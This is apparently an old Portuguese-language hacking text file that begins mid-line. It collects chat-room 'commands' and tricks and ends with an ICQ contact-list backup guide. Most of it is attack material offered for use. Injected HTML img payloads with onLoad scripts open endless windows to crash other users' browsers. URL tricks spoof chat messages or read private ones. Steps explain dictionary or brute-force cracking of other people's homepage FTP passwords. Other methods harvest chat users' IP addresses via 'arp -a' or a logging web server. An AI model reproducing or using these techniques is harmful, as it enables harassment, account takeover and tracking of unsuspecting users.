/~aod/xx/holes06.jpg"></a>
13-Esse e' para vc entrar na sala sem ser de imagens e detonar com todo mundo
que estiver com o java ligado. Abre 30 janelas direto.
<img src='http://www.matrix.com.br/frazzon/fogo.gif'><i><B>
¥X×HELL×X¥</B></I><imgsrc='http://www.matrix.com.br/frazzon/
fogo.gif' onLoad="alert('\n Entrei na sala e vc vai sair! \n\n When you mess
with the BEST , die like the REST\n\n
¥××HELL××¥!!');variCounter=0;while(true)window.open('http://www.NETural.com/
~ccamel');"CRASHING"+iCounter('width=1,height=1,resizable=no');iCounter++"&#
62</CENTER>
COMANDO - 14 - Para expulsar um chato da sala escreva o seguinte ;
-< img src=http://www.iis.com.br/~schuler/an-099.gif onLoad="alert('\n
ATÉ OUTRO DIA \n\n
Tchau!!');variCounter=0;while(true)window.open('http://www.NETural.com/~ccamel');"CRASHING"+iCounter('width=1,height=1,res
izable=no');iCounter++"
>..ATENÇÃO :- marque, copie e cole no seu arquivo, porem se você não
souber, e fôr copiar manualmente ande com a barra de "status
COMANDO - 15 - Para tirar o banner na sala da UOL, escreva o
seguinte ;< img src= "=" width=605 height=1000000000 border=20> <
img src= "=" width=605 height=1000000000 border=20> < img src= "="
width=605 height=1000000000 border=20>
http://sartre.uol.com.br:2951/&USER=2001+HK%26LT%26LTTABLE%3e
COMANDO - 15 - : Este comando permite que você diga assim no chat da UOL: Aleksei invade a sala com sua ferrari e fala para as gatas : Ola gata, quer teclar??
Você tem que digitar isso no LOCATION :http://chatter.uol.com.br:2051/&USER=SEU-NICK-SEM-ESPACOS&VERBOSE=0&HISTORY=80&NOPIC=0&WHOTO=
Aqui+vc+digita+a+mensagem+obs+toda+a+vez+que+vc+digitar+não+de+espaço+sempre+de+o+sinal+de+MAIS&SAYS=
Agora+vc+entendeu????
COMANDO - 17 - Esse comando permite que você fale assim no chat do ZAZ : Aleksei invade a sala romanticamente e oferece ROSAS as gatas : Aki suas rosas ---,--,--´--@
Digite isso no LOCATION:http://chat1.zaz.com.br:9931/input.cgi?_Modo=Fala+para+uma+gata+na+sala+afim+de+conversar+&_Destino=+&_Mens=
GATAS+AFINS???%3F&c=4c.gif&_NomeUsr1=vakh&_Sala=10+a+15+anos+A&_email=NOMES&_dir=Idade&ro=0&a=enviar
COMANDO - 18 - Para você ler o reservado no chat da UNINET digite
o seguinte : - ... (treis pontinhos) e coloque na janela do nome - após,
colocar entre na sala - vai funcionar até que o provedor corriga o furo
COMANDO - 19 - Para você entrar sem nome no UOL, digite o seguinte
: (no lugar de botar o nome bote só o sinal 2 pontos " : ")
Esta técnica funciona apenas com páginas
com final /, por exemplo:
http://members.xoom.com/SOTD
Para hackear HPs, você presisa de um programa
chamado Unsecure, para baixálo, clike aqui.
Usá-lo é bem simples, vá
ao Propt do DOS e digite: ping servidor de ftp
Exemplo: ping ftp.xoom.com
Após isso, aparecerá um IP, vá
ao Unsecure e no campo Computer IP, digite o IP que apareceu no prompt
do DOS.
No campo Username, coloque o final do endereço.
Exemplo: Em http://members.xoom.com/SOTD, o username
é SOTD.
Em http://members.xoom.com/hacker, o username é hacker.
Crie um texto com palavras, nomes, números,
etc...
O Unsecure tentará adivinhar a senha,
para isso, click em file, depois em open dictionary file.
Abra o tesxto criado por você.
Faça várias tentativas iguais por
7 dias, se nenhuma funcionar, é porque a senha correta não
está no arquivo de texto que você criou.
É importante que você tente várias
vezes, as vezes o programa falha no mesmo site, por isso aconselho a tentar
várias vezes por 7 dias, depois desistir.
Claro, existe uma alternativa, no campo attack
options, você pode escolher ao invés de atake por dicionádio,
força bruta (é obrigatório escolher um modo).
Para configurar o modo Força Bruta, vá
ao campo brute force options e escolha os caracteres a serem usados.
De ambos os modos, prevalece a regra dos 7 dias,
portanto, tenha paciência e divirta-se.
Boa Sorte!!!
Bom, antes de mais nada, queria lembrar q este
texto e educativo...
Entao se vc fizer cagada o problema e UNICAMENTE
SEU!!!
ICQ: Bom, pelo icq, e muito facil se pegar IPs...Vamos
lah!
1-) Voce pode fazer assim: mande uma mensagem
do icq para a vitima q vc
quer rastrear o IP...Ai, vc vai no DOS(C:\WINDOWS>)
e digita:
arp -a
Facil ne???ai vao aparecer todos os IPs com quem
o seu pc se comunicou.
o Interface é o seu IP...ai embaixo de
Interface vai aparecer uma lista
com um monte de IPs...o primeiro de la, sera
o do kra q vc mandou a
mensagem, entao, o IP do kra.
2-) Voce tambem pode pegar cracks para isso. E
so vc procurar q vc
vai achar cracks tipo: IPUNHIDER, IPUNMASK, etc...Bom,
vamos supor q
vc ja tem o crack(e importante lembrar q vc deve
pegar o crack certo
para a versao do seu icq(99, 98, etc), ai e so
vc fexar o icq(fechar
mesmo, nao deixar offline, fechar mesmo), coiar
o arquivo para o
diretorio onde seu icq esta(se vc nao mudou nada
na instalacao, ele ta
no c:\Arquivos de Programa\icq), e executar...ai
e so esperar e pronto!
Quando vc der info em qualquer kra, o IP vai
estar la, mesmo este
tendo ocultado ele.
-----------------------------------------------------------------------
Bate-Papos(chats):
1-)Pega um programa xamado XITAMI e abre ele.
Vai no bate-papo q aceite
imagem, e manda essa imagem <img src="http://seu_ip/xitami1.gif">
obs: No lugar de seu_ip, vc bota seu IP(se vc
nao souber qual e, e so
abrir o xitami q aparecera la).Ai, vai mandar
uma imagem do xitami.
Espera um pouco pro xitami rastrear e pronto!!!Da
um terminate no
no xitami. Vai no windows explorer, vai em arquivos
de programa e abre
a pasta xiwin(pasta do xitami).Abre o arquivo
acess.log(pode abrir ate
mesmo no WordPad) e la estarao os IPs dos kras
da sala, o sistema
operacional q eles estao usando, seus nicks,
e seus respectivos IPs.
2-)Em alguns bate=papos, os esquemas do arp -a
funcionam...mas veja
se o IP q aparecer e o do kra, e nao o do bate-papo,
se nao da merda,
ok???
Se vc fizer bosta e for pego, o problema sera
SEU, eu nao tenho nada
a ver com isso, pois esse texto tem intuito educacional
apenas!!!
by «†¦-¦Ø®»™
to slash{DOMI}
Proteja seu ICQ Introdução
Quem aqui já não perdeu, por causa
que formatou o computador, ou até mesmo por causa de ataques de
hackers, a lista do ICQ? Muitos não? Tem gente que vive perdendo
a lista. Mas isso pode ser facilmente evitado. É só ter backup
da lista em um local seguro, como por exemplo um disquete, ou um outro
HD.
E como eu faço o backup?
É muito simples. Siga o roteiro que dificilmente
você irá se perder. Você vai precisar de um disquete.
Abra o Explorer e vá até o local
onde você instalou o ICQ (comumente C:\Arquivos de Programas\ICQ).
Copie as pastas DB e UIN para o disquete. Essas
pastas armazenam sua lista, seu UIN (senha, etc...) e o histórico
de suas mensagens.
Dê Iniciar/Executar. Escreva "regedit.exe"
(sem as aspas) e aperte Ok.
Você vai estar no Editor de Registro de
Windows. Agora clique naquele + do lado do HKEY_CURRENT_USER, e depois
Software. Dentro do Software, procure a pasta Mirabillis. Clique em cima
dela.
Então clique lá no menu, em Registro,
depois escolha Exportar arquivo de Registro. Do jeito que está salve
no mesmo lugar onde você salvou o diretório DB e o UIN.
Pronto! Sua lista está a salvo!